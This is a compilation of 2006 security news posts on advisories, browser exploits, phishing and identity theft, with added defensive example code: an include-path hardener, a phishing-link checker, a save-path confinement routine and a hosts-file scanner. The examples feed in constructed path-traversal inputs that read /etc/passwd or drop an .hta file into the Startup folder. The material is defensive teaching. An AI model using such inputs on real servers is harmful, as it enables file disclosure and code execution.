"During the battle with US Secret Service, we !@#&! all those [law enforcement] bastards and now are running a brand new, improved and the biggest carder' forum you ever seen." The message brags about its array of stolen goods: U.S. and European credit-card data, "active and wealthy" PayPal (EBAY) accounts, and Social Security numbers. Those who "register today" get a "bonus" choice of "one Citybank account with online access with 3K on board" or "25 credit cards with PINs for online carding."

Saturday, May 20, 2006

phpAdsNew / phpPgAds < 2.0.6 Multiple Vulnerabilities
The remote host is running phpAdsNew / phpPgAds, an open-source banner ad server.
The version of phpAdsNew / phpPgAds installed on the remote host suffers from several flaws :
- Remote PHP Code Injection Vulnerability
The XML-RPC library bundled with the application allows an attacker to inject arbitrary PHP code via the 'adxmlrpc.php' script to be executed within the context of the affected web server user id.
- Multiple Local File Inclusion Vulnerabilities
The application fails to sanitize user-supplied input to the 'layerstyle' parameter of the 'adlayer.php' script and the 'language' parameter of the 'admin/js-form.php' script before using them to include PHP files for execution. An attacker can exploit these issues to read arbitrary local files provided PHP's 'magic_quotes' directive is disabled.
- SQL Injection Vulnerability
An attacker can manipulate SQL queries via input to the 'clientid' parameter of the 'libraries/lib-view-direct.inc.php' script.
See also : http://www.securityfocus.com/archive/1/408423/30/120/threaded
Solution : Upgrade to phpAdsNew / phpPgAds 2.0.6 or later.
Risk factor : High
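To make the local file inclusion finding concrete, here is an added example, not code from phpAdsNew. It is written in JavaScript so that it runs stand-alone; the vulnerable function has the shape such a PHP bug usually has (the request parameter concatenated with '.php' and handed to include), and the magicQuotes helper reproduces what PHP's magic_quotes_gpc did to request data, which is why the advisory says the arbitrary file read only works with that directive off. The include root and the layer names are assumptions. The NUL-byte truncation the read relies on existed in PHP releases of that era; later PHP releases reject paths containing a NUL outright.

```javascript
// Added example, not phpAdsNew code: an unsanitized include parameter, the
// NUL-byte trick that turns it into an arbitrary file read, the effect of
// magic_quotes on that trick, and an allow-listed resolver that closes it.
// Root directory and layer names are hypothetical.

const INCLUDE_ROOT = '/var/www/phpAdsNew/layers'; // assumed

// Pure string normalisation of a POSIX path: resolves '.' and '..' without
// touching the filesystem, so the example runs anywhere.
function normalizePosix(p) {
  const out = [];
  for (const seg of p.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') { out.pop(); continue; }
    out.push(seg);
  }
  return '/' + out.join('/');
}

// Vulnerable: same shape as include($layerstyle . '.php').
// In PHP of that era a NUL byte in the parameter ended the C string handed to
// open(), so everything after it, including the '.php' suffix, was never seen.
function resolveIncludeVulnerable(layerstyle) {
  const raw = INCLUDE_ROOT + '/' + layerstyle + '.php';
  const nul = raw.indexOf('\0');
  const effective = nul === -1 ? raw : raw.slice(0, nul); // what open() sees
  return normalizePosix(effective);
}

// What magic_quotes_gpc did to request data: backslash-escape quotes,
// backslashes and NUL. '\0' becomes the two characters '\' '0', so the
// truncation no longer works; traversal to a file that really ends in .php
// would still work, which is why an allow-list is the actual fix.
function magicQuotes(s) {
  return s.replace(/[\\'"\0]/g, (c) => (c === '\0' ? '\\0' : '\\' + c));
}

// Hardened: allow-list the value, reject NUL and path separators, and confirm
// the resolved path is still under the include root.
const ALLOWED_LAYERS = new Set(['default', 'popup', 'floating']); // assumed names

function resolveIncludeSafe(layerstyle) {
  if (typeof layerstyle !== 'string') return null;
  if (layerstyle.includes('\0')) return null;
  if (!/^[a-z0-9_-]+$/i.test(layerstyle)) return null; // no '/', no '..'
  if (!ALLOWED_LAYERS.has(layerstyle)) return null;
  const resolved = normalizePosix(INCLUDE_ROOT + '/' + layerstyle + '.php');
  if (!resolved.startsWith(INCLUDE_ROOT + '/')) return null; // belt and braces
  return resolved;
}

// Constructed attacker input: four levels up, then /etc/passwd, then a NUL.
const ATTACK = '../../../../etc/passwd\0';

console.log('vulnerable, magic_quotes off :', resolveIncludeVulnerable(ATTACK));
console.log('vulnerable, magic_quotes on  :', resolveIncludeVulnerable(magicQuotes(ATTACK)));
console.log('safe resolver, attack input  :', resolveIncludeSafe(ATTACK));
console.log('safe resolver, "default"     :', resolveIncludeSafe('default'));
```

The same allow-list approach applies to the 'language' parameter of admin/js-form.php named in the advisory. For the 'clientid' SQL injection the corresponding fix is a parameterised query rather than string concatenation, and for the XML-RPC code injection there is no local workaround short of upgrading or removing adxmlrpc.php.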

Wednesday, May 17, 2006
Less than a week after Apple shipped a mega-update with fixes for a whopping 43 Mac OS X and QuickTime vulnerabilities, independent researcher Tom Ferris said that multiple Safari browser flaws remain unpatched.
Ferris, who has become a bit of a gadfly for Apple, reported the Safari vulnerabilities to Apple on April 19, but after testing Security Update 2006-003 he said these issues have not yet been addressed.
Ferris, who goes by the online moniker "badpack3t," said the Safari bugs cause the application to crash and may allow a malicious attacker to execute arbitrary code. On his Security-Protocols.com Web site, Ferris has released technical information on the flaws alongside proof-of-concept code to reproduce the browser crashes.
Back in April, Ferris also flagged a heap overflow vulnerability triggered when specially crafted ".bmp" files are processed and decompressed. Although the Mac OS X update promised a fix for that bug, Ferris insists the underlying issue has not been addressed.
"[The update] does prevent the crash when opening [my] original proof-of-concept file. But after slightly modifying that file, I was able to trigger the same issue with the latest security update installed," Ferris said.
Ferris, who uses fuzzing techniques to identify application bugs, also plans to report several new ".tiff" flaws to Apple's security team. As per policy, Apple does not comment on potential security vulnerabilities in its products until a fix is available. Meanwhile, Mac OS X users are reporting post-patch hiccups ranging from system hangs to boot-up problems.

Tuesday, May 02, 2006
Phishing scam artists have recently started using a technique described as steganography: rather than sending text, they put the whole message, along with authentic-looking logos of the spoofed institution (Citibank being the most cited), into a single bitmap image. Up to now phishing e-mail has used text and images together to lure victims to malicious web sites; an image-only message leaves no text for a content filter to match on, and some of these messages also carry code that exploits vulnerabilities to cover its tracks. One way users can avoid these messages is to set their e-mail client to text only, or to block all images.

Monday, April 24, 2006
Microsoft Corp. plans to re-issue a security patch for its Windows operating system that caused serious headaches for some users.
The MS06-015 security update was released last week, but Microsoft customers soon reported that it was causing applications to crash thanks to a conflict between the patch and NVidia Corp.'s video drivers and Hewlett-Packard Co.'s Share-to-Web photo-sharing software.
The new update is presently being tested, and is expected to be released next Tuesday, the same day that Microsoft is scheduled to release its non-security updates for the month.
"What we have done is re-engineered the MS06-015 update to avoid the conflict altogether with the older Hewlett Packard and NVidia software," wrote Microsoft security response center program manager Stephen Toulouse in a Friday blog posting. "What the new update essentially does is simply add the affected third party software to an 'exception list' so that the problem does not occur."
The update will also provide an automated way of fixing the Windows registry configuration database on affected systems, a work-around that had been previously suggested by Microsoft.

Multiple vulnerabilities have been reported in Apple Mac OS X and applications. Proof of Concept code has already been posted along with the information regarding the vulnerabilities. At this time no patches or workarounds appear to be available for the majority of the vulnerabilities. The impact is Denial of Service or remote execution of arbitrary code, and the severity is highly critical.
Links to advisories:
Apple OS X 10.4.5 .tiff "LZWDecodeVector ()" Heap Overflow
http://www.security-protocols.com/sp-x24-advisory.php
Apple OS X BOM ArchiveHelper .zip Heap Overflow
http://www.security-protocols.com/sp-x25-advisory.php
Apple OS X Safari 2.0.3 Multiple Vulnerabilities
http://www.security-protocols.com/sp-x26-advisory.php
Apple OS X 10.4.6 "ReadBMP ()" .bmp Heap Overflow
http://www.security-protocols.com/sp-x27-advisory.php
Apple OS X 10.4.6 "CFAllocatorAllocate ()" .gif Heap Overflow
http://www.security-protocols.com/sp-x28-advisory.php
Apple OS X 10.4.6 .tiff "_cg_TIFFSetField ()" DoS
http://www.security-protocols.com/sp-x29-advisory.php
Apple OS X 10.4.6 .tiff "PredictorVSetField ()" Heap Overflow
http://www.security-protocols.com/sp-x30-advisory.php

Saturday, April 08, 2006
Next week's batch of Microsoft patches will do more than update security for Internet Explorer (IE). Patch Tuesday will include a 60-day reprieve for developers still adapting to a February upgrade of Internet Explorer 6.
This may be an admission that changes made to the way the browser handles ActiveX controls created some problems for Internet applications. The patent lawsuit by Eolas Technologies forced the changes to IE.
The non-security update to IE will include a compatibility patch, which offers a reprieve until June for enterprise customers that expressed the need for more time to adapt, Microsoft said Monday.
The ActiveX change was first released to developers Feb. 9 and then publicly through Windows Update Feb. 28; it requires IE users to click on an ActiveX control embedded in a Web page before they can interact with it. New computers ship with the updated IE, but Microsoft saw a need to give developers more time to adapt, which is what the April 11 compatibility patch provides, according to the Microsoft Security Response Center blog.
While the software giant is providing Web sites a reprieve from the ActiveX changes, the company emphasizes the patch should be removed as soon as applications are fixed. Microsoft will also release a security patch to address the createTextRange vulnerability, the basis for recently reported IE exploits last month.
The delay in patching the vulnerability has prompted third-party patches to fill the gap.

Tuesday, April 04, 2006
Microsoft is releasing a software update to Microsoft Internet Explorer 6 for Microsoft Windows XP Service Pack 2 (SP2) and for Microsoft Windows Server 2003 Service Pack 1 (SP1). This update changes the way in which Internet Explorer handles some Web pages that use ActiveX controls. Examples of programs that use ActiveX controls include the following:
Adobe Reader
Apple QuickTime Player
Macromedia Flash
Microsoft Windows Media Player
Real Networks RealPlayer
Sun Java Virtual Machine
After you install this update, you cannot interact with ActiveX controls from certain Web pages until these controls are enabled. To enable an ActiveX control, manually click the control. There are also techniques that Web developers can use to update their Web pages. For more information

Friday, March 31, 2006
According to an alert issued by Websense Security Labs, in San Diego, excerpts from actual BBC News stories are being used to lure IE users to Web sites that launch drive-by downloads of bots, spyware, back doors and other Trojan downloaders.
One version of the spammed e-mail seen contains a portion of a BBC News item published on March 27 about the Chinese yuan hitting a post-revaluation high against the U.S. dollar. After the legitimate excerpt, the hackers embedded a "read more" link that points to a Web site that contains a spoofed copy of the BBC News story from the e-mail.
Websense researchers found that the rigged site exploits the unpatched createTextRange vulnerability to download and install a keystroke logger without any user action. The keylogger monitors activity on various financial Web sites and uploads captured information back to the attacker. It appears that this is the work of a well-organized identity theft ring, stealing bank log-ins and other sensitive user information.
The latest twist comes almost a week after the first wave of attacks started dropping a variant of SDbot, a back door that gives hackers complete control of infected computers. SDbot allows attackers to control victims' computers remotely by sending specific commands via IRC (Internet Relay Chat) channels.
The earlier exploits were being launched from several legitimate Web sites that were hijacked and seeded with malicious code. These include an airline ticketing system, an insurance sales site and a site that sells e-commerce software.

Wednesday, March 29, 2006
What is not understood is why any government cannot simply have these sites terminated at once. Why is phishing not treated as fraud and theft? "Oh, PayPal is a big company, it should be up to them." It is not hard to take a site down. The network hosting this one is easy to identify:
AS4657 asname: STARHUBINTERNET-AS descr: Starhub Internet, Singapore
If APNIC is responsible for these IP addresses, a law governing how one is responsible for one's AS numbers and routes does not seem that hard. The contact listed for the domain name is Acidhurt@starhub.net.sg. "Acidhurt" is right out on front street; how could ignorance of the crime be possible? The site, with all the members' pictures, is there for anyone to see who might be responsible. How hard is this really to figure out? What seems clear is that this type of activity is no longer hidden; it is right out in the open.
The phishing message received:

We are writing to let you know that you have to update Your account information.
To update Your information follow the link below and login into your PayPal account to read it:
https://www.paypal.com/update/cgi-bin?messageID=IDHMIFuomIUH8
This is the PayPal Inc. online department. If you have received this email by mistake please ignore and delete it.
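As an added example covering both the image-only phishing messages described under May 2 and the PayPal message above, here is a small JavaScript checker (not a product of any of the vendors quoted on this page) that flags a body whose text has been moved into an image, and a link whose visible text is a URL on one domain while its href goes to another host or to a raw IP address. The messages it is run over are constructed for the example; the real href behind the PayPal message is not on this page, so a documentation address (203.0.113.10) stands in for it.

```javascript
// Added example: heuristic checks for two phishing tricks discussed on this
// page, an image-only body and a link whose visible text is a legitimate URL
// while the href goes elsewhere. Not from any of the vendors quoted; all
// sample messages below are constructed.

// Pull <a href="...">text</a> pairs out with a regex. Good enough for a
// heuristic over mail bodies, not a substitute for a real HTML parser.
function extractLinks(html) {
  const links = [];
  const re = /<a\b[^>]*\bhref\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    links.push({ href: m[1], text: m[2].replace(/<[^>]+>/g, '').trim() });
  }
  return links;
}

// Registrable domain approximated by the last two labels. Fine for the brands
// here, wrong for ccSLDs such as co.uk; a real tool would consult the Public
// Suffix List. Raw IP targets get their own rule below.
function baseDomain(hostname) {
  return hostname.toLowerCase().split('.').slice(-2).join('.');
}

function hostOf(urlish) {
  try { return new URL(urlish).hostname; } catch (e) { return null; }
}

function stripTags(html) {
  return html.replace(/<style[\s\S]*?<\/style>/gi, '')
             .replace(/<[^>]+>/g, ' ')
             .replace(/\s+/g, ' ').trim();
}

// Returns a list of findings (empty means nothing suspicious was seen).
function analyzeMessage(html) {
  const findings = [];
  const text = stripTags(html);
  const images = (html.match(/<img\b/gi) || []).length;
  if (images > 0 && text.length < 40) {
    findings.push('image-only body: the message text has been moved into an image');
  }
  for (const link of extractLinks(html)) {
    const hrefHost = hostOf(link.href);
    const textHost = hostOf(link.text);
    if (hrefHost === null) {
      findings.push(`unparseable href: ${link.href}`);
      continue;
    }
    // Visible text looks like a URL, but its domain is not the real target's.
    if (textHost && baseDomain(textHost) !== baseDomain(hrefHost)) {
      findings.push(`link text shows ${textHost} but href goes to ${hrefHost}`);
    }
    if (/^\d{1,3}(\.\d{1,3}){3}$/.test(hrefHost)) {
      findings.push(`href points at a raw IP address: ${hrefHost}`);
    }
  }
  return findings;
}

// Constructed samples. The displayed PayPal URL is the one shown in the
// message above; the href behind it is an assumption (TEST-NET-3 address).
const SAMPLE_PAYPAL = `
<p>We are writing to let you know that you have to update Your account information.</p>
<p><a href="http://203.0.113.10/paypal/update/cgi-bin?messageID=IDHMIFuomIUH8">https://www.paypal.com/update/cgi-bin?messageID=IDHMIFuomIUH8</a></p>`;
const SAMPLE_IMAGE_ONLY = '<html><body><img src="cid:citibank.gif"></body></html>';
const SAMPLE_LEGIT = '<p>Your receipt: <a href="https://www.paypal.com/receipt/123">https://www.paypal.com/receipt/123</a></p>';

for (const [name, body] of [['paypal', SAMPLE_PAYPAL], ['image-only', SAMPLE_IMAGE_ONLY], ['legit', SAMPLE_LEGIT]]) {
  console.log(name, analyzeMessage(body));
}
```

The two-label domain comparison is the weak spot of this checker; on a mail gateway you would replace it with a Public Suffix List lookup and add the usual extras (punycode hosts, look-alike brand names in the host, shortened URLs).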

Tuesday, March 28, 2006
The unofficial fix blocks access to the vulnerable component in the Microsoft Web browser, preventing malicious Web sites from taking advantage of the vulnerability, said Steve Manzuik, security product manager at eEye in Aliso Viejo, Calif. Microsoft does not have a fix for the flaw available yet.
Though eEye's patch does protect PCs against attacks that take advantage of the flaw, the company recommends installing the fix only as a last resort. "Organizations should only install this patch if they are not able to disable Active Scripting as a means of mitigation," Manzuik said. Disabling Active Scripting is Microsoft's suggested work-around.
"This patch is not meant to replace the forthcoming Microsoft patch, rather it is intended as a temporary protection against this flaw," Manzuik said.
eEye, which makes an intrusion-prevention product called Blink, crafted the fix at the request of its customers, Manzuik said. "Customers who don't have Blink deployed yet were looking for a temporary solution," he said. However, eEye has made the fix available for anyone, on its Web site.
Microsoft doesn't recommend installing eEye's fix. "We have not tested this mitigation tool," said Stephen Toulouse, a program manager in Microsoft's Security Response Center. "We can't recommend it because we have not tested it...Customers should weigh the risk of applying something like this to their systems."
The vulnerability has to do with how Internet Explorer handles the "createTextRange()" method in Web pages. Since the flaw was disclosed publicly last week, more than 200 Web sites have been found to exploit it. These sites typically install spyware, remote control software and Trojan horses on vulnerable PCs, according to security company Websense.
Microsoft has also seen the attacks, but Toulouse said "the spread rate appears to be relatively limited." That means there aren't many new attacks being launched. Microsoft is working with law enforcement to take down Web sites that are hosting the attacks, which are often hacked sites, he said.

Monday, March 27, 2006
Security experts have warned internet users to be on their guard against a new phishing and spyware scam targeting 2006 Fifa World Cup enthusiasts. The fraud is executed using bogus emails claiming to be from MasterCard offering free travel and tickets to the World Cup finals in Germany.
Recipients of the malicious emails are encouraged to click on a link to claim the prize. But doing so results in a key-logger downloading to the user's desktop. When the infected user accesses a variety of legitimate online banking sites, the key-logger mimics the website and captures personal banking information.
The scam has been detected targeting the following banking websites: bradesco.com.br, itau.com.br, unibanco.com.br, bancoreal.com.br, caixa.gov.br and caixa.com.br, according to security firm SurfControl.

Saturday, March 25, 2006

This is our second warning: the first wave of attacks against an unpatched flaw in Microsoft's Internet Explorer browser has already begun, and security experts warn that the threat will grow significantly over the weekend.
Less than 24 hours after Microsoft issued details for IE users, malware hunters have started detecting drive-by downloads on more than 20 maliciously rigged Web sites.
A list of more than 20 unique domains and 100 unique URLs hosting the exploits has already been reported. The exploits are dropping a variant of SDbot, a dangerous family of backdoors that give hackers complete ownership of infected computers.
SDbot allows attackers to control victims' computers remotely by sending specific commands via IRC (Internet Relay Chat) channels. The backdoors have also been used as keyloggers to steal sensitive user information, and to spread across the local network to computers vulnerable to other exploits.
Some of these attackers are the same people who were exploiting the WMF vulnerability. This will continue to get worse over the weekend, especially if they work out how to get the exploits to run reliably.
One of the interesting things we're seeing is that the shellcode doesn't work on a lot of these sites. That suggests they're still testing the exploits and getting ready to do some major damage.
In addition to SDbot variants, the sites are dumping spyware and keystroke loggers on machines without requiring any user action. Simply surfing to one of these sites will compromise the machine.

Thursday, March 23, 2006

Microsoft plans to release a pre-patch advisory with workarounds for a "highly critical" vulnerability that could put millions of Internet Explorer users at the mercy of malicious hackers.
The advisory, which will be posted here, acknowledges a code execution hole that was discovered and publicly reported by Secunia Research of Copenhagen, Denmark. Secunia said in an alert that the vulnerability is due to an error in the processing of the "createTextRange()" method call applied on a radio button control.
"This can be exploited by a malicious Web site to corrupt memory in a way that allows the program flow to be redirected to the heap," Secunia said in the alert, warning that successful exploitation allows execution of arbitrary code whenever the target visits the rigged Web site.
The vulnerability was confirmed on a fully patched system with IE 6.0 and Microsoft Windows XP SP2. It has also been confirmed in IE 7 Beta 2 Preview, Secunia said. The MSRC (Microsoft Security Response Center) said in a blog entry that users of the new refresh of the IE7 Beta 2 Preview announced at Mix '06 are not affected. Lennart Wistrand, a program manager in the MSRC, recommended that IE users turn off Active Scripting to prevent a possible attack.
"Customers who use supported versions of Outlook or Outlook Express aren't at risk from the e-mail vector since script doesn't render in mail [being read in the restricted sites zone]," Wistrand added. The latest warning comes just 24 hours after the discovery, and public release, of a denial-of-service bug in the dominant Web browser.

Tuesday, March 21, 2006
As the April 15th tax filing deadline approaches, cyber fraudsters are planning their attack on online tax filers to steal confidential information. Websense, Inc. (NASDAQ:WBSN) , a global leader in web security and web filtering productivity software, today announced that Websense(R) Security Labs(TM) has seen a rise in phishing attacks via fraudulent emails and websites that spoof the Internal Revenue Service (IRS). Since December 2005, Websense Security Labs has been working together with the IRS and other organizations to investigate the rise of tax scams and better protect consumers and employee computing environments from increasingly sophisticated and dangerous internet security threats.
Websense Security Labs has discovered tax-themed attacks aimed at U.S. taxpayers that are hosted on compromised web servers in several countries outside the U.S. For example, one of the largest IRS phishing campaigns claims that the taxpayer is eligible for a refund and needs to log on to a website to verify their information. Users receive one of a variety of email messages with a link to a fraudulent website. Upon accessing the spoofed tax website, the user is then forwarded to a fraudulent site that requests credit card information and other personal identifiers. The intent of these attacks is to dupe users into revealing confidential information which can then be used for withdrawing funds.
Phishing can present a serious security risk for consumers and organizations. Phishers are becoming more sophisticated in their deception techniques to lure employees to spoofed websites, as most employees cannot determine which is a genuine site and which is a fake. However, employees don't have to "fall for the phish" and actually enter confidential information on a phishing website to be compromised. For example, recent trends indicate that by just visiting a website, many types of phishing URLs can install spyware, such as a malicious keylogger, which has the ability to capture data including network passwords or social security numbers without their knowledge. It only takes one employee to click on a phishing site and accidentally give out confidential corporate data, customer records, network passwords, or trade secrets to jeopardize an entire organization's intellectual property.

Sunday, March 19, 2006
The following is a post from Schneier on Security. Bruce Schneier said this is great work by Yossi Oren and Adi Shamir:
Abstract (Summary)
We show the first power analysis attack on passive RFID tags. Compared to standard power analysis attacks, this attack is unique in that it requires no physical contact with the device under attack. While the specific attack described here requires the attacker to actually transmit data to the tag under attack, the power analysis part itself requires only a receive antenna. This means that a variant of this attack can be devised such that the attacker is completely passive while it is acquiring the data, making the attack very hard to detect. As a proof of concept, we describe a password extraction attack on Class 1 Generation 1 EPC tags operating in the UHF frequency range. The attack presented below lets an adversary discover the kill password of such a tag and, then, disable it. The attack can be readily adapted to finding the access and kill passwords of Gen 2 tags. The main significance of our attack is in its implications: any cryptographic functionality built into tags needs to be designed to be resistant to power analysis, and achieving this resistance is an undertaking which has an effect both on the price and on the read range of tags.
My guess of the industry's response: downplay the results and pretend it's not a problem.
GPG is an open-source version of the PGP e-mail encryption protocol. Recently, a very serious vulnerability was discovered in the software: given a signed e-mail message, you can modify the message -- specifically, you can prepend or append arbitrary data -- without disturbing the signature verification.
It appears this bug has existed for years without anybody finding it.
Moral: Open source does not necessarily mean "fewer bugs." Bruce Schneier wrote about this back in 1999.
UPDATED TO ADD (3/13): This bug is fixed in Version 1.4.2.2. Users should upgrade immediately.
Schneier on Security

Thursday, March 16, 2006
The number of victims in the world's largest identity theft case could surpass one million, authorities in South Korea have reported.
Police announced this week that the number of victims of ID theft connected to the online game Lineage is between 980,000 and 1.22 million, according to the Korea Herald.
The game's developer, NCsoft, said that, as of Sunday, it has received confirmation from over 175,000 people in South Korea that their national identity numbers have been used without their knowledge to register accounts in its Lineage series of multiplayer online role-playing games.
As reported on vnunet, the bogus accounts were apparently used by China-based groups to generate virtual items in the game world which were then sold to gamers in exchange for real world cash.
Police now report that they have traced email addresses to China. Approximately 1,500 different IP addresses were used to connect to the illegal accounts.
New account registrations which provided a free trial period of several days could previously be obtained simply by entering an ID number into an online form. NCsoft said that it has since tightened up its registration procedures.
Previous reports estimated the number of active, legitimate Lineage accounts at between three and four million.
Despite the surprising addition of about one million new accounts in only four months, the company was slow to take action, according to local press reports. News of the unprecedented ID theft did not become public until February.
Police have suggested that the huge number of stolen Korean ID numbers could have been handed over during a legitimate business deal between Korean online shopping websites and their Chinese subcontractors.
Earlier reports blamed hackers for stealing the ID numbers from Korean websites' databases.
In a case in which damage claims could theoretically exceed $1bn, Korean lawyers are planning to sue NCsoft for $1,000 per ID theft victim in a class action lawsuit. Reports late last month said that 3,500 potential plaintiffs had joined the action so far.
The furore generated by the case has reportedly led the Korean government to strengthen ID theft penalties with a new three-year jail sentence for offenders.

Adobe is urging users of its document and graphics server equipment to harden their systems after the discovery of a critical flaw.
Danish vulnerability testing firm Secunia first reported the flaw, which it describes as 'moderately critical', in July 2005 but it has taken until now for Adobe to fix the problem. Adobe has issued an advisory on its website.
The problem lies in the Adobe Document Server 'saveContent' and 'saveOptimized' commands, which can be made to save files anywhere on the server's filesystem, including locations that every user has full access to.
"This can be exploited by sending a specially crafted Soap request to the web service to write a graphics file containing malicious JavaScript as metadata to e.g. the server's 'All Users' start-up folder," warned Secunia.
"The request can be constructed to save this graphics file with an HTA extension causing the file to be executed the next time any user logs in.
"A request containing 'loadContent' can also be sent to retrieve arbitrary graphics or PDF files from the server, potentially exposing sensitive information."
Adobe recommends adapting local access controls to mitigate against the problem, and officially thanked Secunia for bringing the issue to its attention.
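The write-anywhere problem above is a classic path-confinement failure: the client names the destination and the service trusts it. The following is an added example, not Adobe's code, of the lexical check such a save handler should apply before touching the disk. The function name, the extension list and the sample requests are assumptions for illustration; the trailing-dot and alternate-data-stream checks go beyond what the advisory describes and cover Windows filename quirks that a plain ".." check misses.

```c
/* Added example (not Adobe's code): confine a client-supplied save path to
 * the content root and refuse names Windows would execute on logon. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define MAX_SEGS 64

/* Extensions the service must never write, however the client names the file. */
static const char *const blocked_ext[] = {
    ".hta", ".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".lnk", NULL };

/* Resolves REQUESTED lexically and writes a root-relative, forward-slash path
 * into OUT. Returns 0 on success, -1 when the request is absolute, climbs out
 * of the root, carries a ':' (drive letter or NTFS alternate data stream), ends
 * in '.' or ' ' (which Windows silently strips), or has a blocked extension. */
int confine_path(const char *requested, char *out, size_t outlen) {
    char buf[512];
    const char *segs[MAX_SEGS];
    int depth = 0;

    if (requested == NULL || strlen(requested) >= sizeof buf) return -1;
    if (requested[0] == '/' || requested[0] == '\\') return -1;   /* absolute or UNC */
    if (strchr(requested, ':') != NULL) return -1;                 /* C:\..., file.jpg:x.hta */
    strcpy(buf, requested);

    /* Walk the segments: "." and empty ones vanish, ".." pops one level. */
    for (char *tok = strtok(buf, "/\\"); tok != NULL; tok = strtok(NULL, "/\\")) {
        if (strcmp(tok, ".") == 0) continue;
        if (strcmp(tok, "..") == 0) {
            if (depth == 0) return -1;        /* would climb above the root */
            depth--;
            continue;
        }
        if (depth == MAX_SEGS) return -1;
        segs[depth++] = tok;
    }
    if (depth == 0) return -1;

    /* Leaf name checks. */
    const char *leaf = segs[depth - 1];
    size_t ll = strlen(leaf);
    if (leaf[ll - 1] == '.' || leaf[ll - 1] == ' ') return -1;
    const char *dot = strrchr(leaf, '.');
    if (dot != NULL)
        for (int i = 0; blocked_ext[i] != NULL; i++)
            if (strcasecmp(dot, blocked_ext[i]) == 0) return -1;

    /* Rebuild the confined path. */
    size_t used = 0;
    for (int i = 0; i < depth; i++) {
        size_t sl = strlen(segs[i]);
        if (used + sl + (i > 0 ? 1 : 0) + 1 > outlen) return -1;
        if (i > 0) out[used++] = '/';
        memcpy(out + used, segs[i], sl);
        used += sl;
    }
    out[used] = '\0';
    return 0;
}

int main(void) {
    const char *requests[] = {   /* constructed requests, not real SOAP traffic */
        "images/./2006/report.pdf",
        "../../../Documents and Settings/All Users/Start Menu/Programs/Startup/x.hta",
        "images/evil.HTA",
    };
    char out[512];
    for (size_t i = 0; i < sizeof requests / sizeof requests[0]; i++) {
        int rc = confine_path(requests[i], out, sizeof out);
        printf("%-24s <- %s\n", rc == 0 ? out : "REJECT", requests[i]);
    }
    return 0;
}
```

A lexical check is only half of the fix: junctions or symlinks under the content root can still lead outside it, which is why Adobe's advice to tighten local access controls matters. The service account should simply have no write access to start-up folders, so a bypass of the check still cannot plant a file that runs at logon.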
The Anti-Phishing Working Group (APWG) has reported a sharp rise in the number of phishing attacks, combined with an increased sophistication among attackers.
In its monthly report (PDF) for November 2005 the APWG said that reported attacks grew to 16,882 from 15,820, the third month of growth after a slowdown over the summer.
The UK and Europe were particularly hard hit as phishers looked for new targets outside the US.
The bulk of targets are still financial companies at nearly 95 per cent of attacks in November, up from 86 per cent in October.
There is also evidence that phishers are refining their targets lists, since the number of brands attacked has fallen despite the overall increase in activity.
Almost a third of all phishing sites are hosted in the US. South Korea is the second most popular host at 11.34 per cent, reflecting the country's high levels of broadband penetration.
There is also worrying evidence that attacks are getting smarter. The APWG noted an increase in legitimate sites being cracked and used to spread malware.
"A good example of this scheme was exhibited by an attack on the ShangHai Huizhong Automotive Manufacturing Company, one of the largest car manufacturers in China," the report said.
"Crackers programmed the site to deliver key-loggers to the PCs of consumers visiting the ShangHai Huizhong site, installing a system that attempted to load and run malicious code on the visitors' PCs."
The APWG also found a much higher percentage of DNS redirections carried out by Trojan software, which tampers with name resolution on the victim's machine so that a correctly typed address lands on a phishing site.
One example occurred when a 'security tool' was emailed out claiming to be from PayPal which, once executed, automatically redirected any attempt to access PayPal to a phishing site hosted in India.
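The cheapest way for a Trojan to achieve the redirection just described is to add lines to the local hosts file, which Windows consults before asking any DNS server. The following is an added example, not from the APWG report, of a check an administrator or incident responder can run over that file: any line that maps a watched brand to something other than the local host is a redirection. The watch list, the function names and the sample hosts content are constructed for illustration.

```c
/* Added example (not from the APWG report): flag hosts-file lines that
 * redirect a watched domain to a non-local address. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Domains a hosts file should never map to anything but the local host
 * (constructed watch list; extend with whatever your users bank with). */
static const char *const watched[] = { "paypal.com", "ebay.com", "chase.com", NULL };

/* True when HOST is a watched domain or a subdomain of one (case-insensitive). */
static int is_watched(const char *host) {
    size_t hl = strlen(host);
    for (int i = 0; watched[i] != NULL; i++) {
        size_t wl = strlen(watched[i]);
        if (hl == wl && strcasecmp(host, watched[i]) == 0) return 1;
        if (hl > wl && host[hl - wl - 1] == '.' &&
            strcasecmp(host + (hl - wl), watched[i]) == 0) return 1;
    }
    return 0;
}

/* Addresses that block a name rather than send it somewhere else. */
static int is_local(const char *addr) {
    return strncmp(addr, "127.", 4) == 0 || strcmp(addr, "::1") == 0 ||
           strcmp(addr, "0.0.0.0") == 0;
}

/* Scans HOSTS_TEXT (the whole file as one string). Returns the number of
 * lines that map a watched domain to a non-local address and copies up to
 * MAXN of those lines, verbatim, into REPORT. */
int scan_hosts(const char *hosts_text, char report[][128], int maxn) {
    int found = 0;
    const char *line = hosts_text;
    while (*line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char raw[128], work[128];
        if (len >= sizeof raw) len = sizeof raw - 1;   /* overlong lines are clipped */
        memcpy(raw, line, len);
        raw[len] = '\0';
        line = nl ? nl + 1 : line + strlen(line);

        strcpy(work, raw);
        char *hash = strchr(work, '#');                /* drop trailing comment */
        if (hash) *hash = '\0';
        char *addr = strtok(work, " \t\r");
        if (addr == NULL || is_local(addr)) continue;
        int bad = 0;
        for (char *h = strtok(NULL, " \t\r"); h != NULL; h = strtok(NULL, " \t\r"))
            if (is_watched(h)) bad = 1;
        if (bad) {
            if (found < maxn) strcpy(report[found], raw);
            found++;
        }
    }
    return found;
}

/* Constructed sample, not a capture from a real machine. */
static const char sample_hosts[] =
    "# constructed sample hosts file\n"
    "127.0.0.1       localhost\n"
    "0.0.0.0         ad.example.net        # blocked on purpose, harmless\n"
    "203.0.113.45    www.paypal.com paypal.com\n"
    "203.0.113.45    signin.ebay.com\n"
    "127.0.0.1       www.chase.com         # blocks the site, does not redirect it\n";

int main(void) {
    char report[8][128];
    int n = scan_hosts(sample_hosts, report, 8);
    for (int i = 0; i < n && i < 8; i++) printf("suspicious: %s\n", report[i]);
    return n > 0;
}
```

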